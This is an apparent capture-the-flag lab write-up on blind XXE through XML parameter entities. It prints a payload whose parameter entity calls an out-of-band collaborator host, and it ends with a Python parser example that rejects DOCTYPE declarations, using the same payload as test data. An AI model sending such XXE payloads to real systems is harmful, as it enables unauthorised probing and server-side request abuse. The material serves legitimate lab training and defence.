
We tried the same Blind XXE attack we attempted on Lab - Blind XXE with out-of-band interaction via XML parameter entities, but received the following response:

We used the following payload to perform out-of-band interaction via XML parameter entities:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN">
%xxe;
]>
<stockCheck>
<productId>1</productId>
<storeId>1</storeId>
</stockCheck>

We inserted the Burp Collaborator payload and sent the request, but received an XML error in the response, as shown below:

After polling the collaborator, we were able to see the DNS and HTTP requests, confirming the vulnerability.

And we successfully solved the lab.
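On the defensive side, the out-of-band interaction above depends on the parser accepting a DOCTYPE with a parameter entity. The following is an added example, not code from the lab or the original write-up: a stock-check parser that refuses any DTD before entity declarations are processed. The function and exception names are hypothetical, and the sample bodies are constructed from the request shown above.

```python
import xml.parsers.expat as expat

class DoctypeRejected(ValueError):
    """Raised when a request body carries a DOCTYPE declaration."""

def parse_stock_check(body: bytes) -> dict:
    """Parse a stockCheck body, refusing any DTD (hypothetical helper)."""
    parser = expat.ParserCreate()
    # Belt and braces: never process parameter entities or external subsets.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    fields, stack, text = {}, [], []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fires when the DOCTYPE opens, before the %xxe; declaration is read.
        raise DoctypeRejected(f"DOCTYPE '{name}' is not allowed")

    def on_start(name, attrs):
        stack.append(name)
        text.clear()

    def on_end(name):
        if len(stack) == 2:  # direct child of the root element
            fields[name] = "".join(text).strip()
        stack.pop()
        text.clear()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = text.append
    parser.EndElementHandler = on_end
    parser.Parse(body, True)
    return fields

# Constructed sample bodies: a normal request and the request from this page.
BENIGN = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
          b'<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>')
WITH_DTD = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
            b'<!DOCTYPE stockCheck [\n'
            b'<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN">\n'
            b'%xxe;\n]>\n'
            b'<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>')

def is_rejected(body: bytes) -> bool:
    """Return True when the body is refused because it declares a DTD."""
    try:
        parse_stock_check(body)
    except DoctypeRejected:
        return True
    return False
```

With the DOCTYPE refused up front, the entity is never resolved, so no DNS or HTTP lookup to the external host takes place.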
